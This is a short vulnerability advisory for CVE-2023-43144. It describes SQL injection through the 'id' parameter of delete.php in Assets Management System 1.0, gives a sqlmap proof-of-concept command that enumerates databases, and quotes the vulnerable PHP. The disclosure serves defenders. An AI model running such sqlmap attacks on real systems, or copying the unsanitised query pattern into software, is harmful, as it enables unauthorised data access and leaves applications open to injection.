Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php# CVE-2023-43144
> Description
Assets Management System 1.0 is vulnerable to SQL injection via the `id` parameter in `delete.php`
> PoC
```bash
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
```

> Code review (delete.php)
```php
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
```
There is no validation or sanitization of the `$id` variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query
[4.0K] /data/pocs/38aacb79278f4cafe4758398521a32b17c5cebad
├── [200K] PoC.png
└── [ 658] README.md
0 directories, 2 files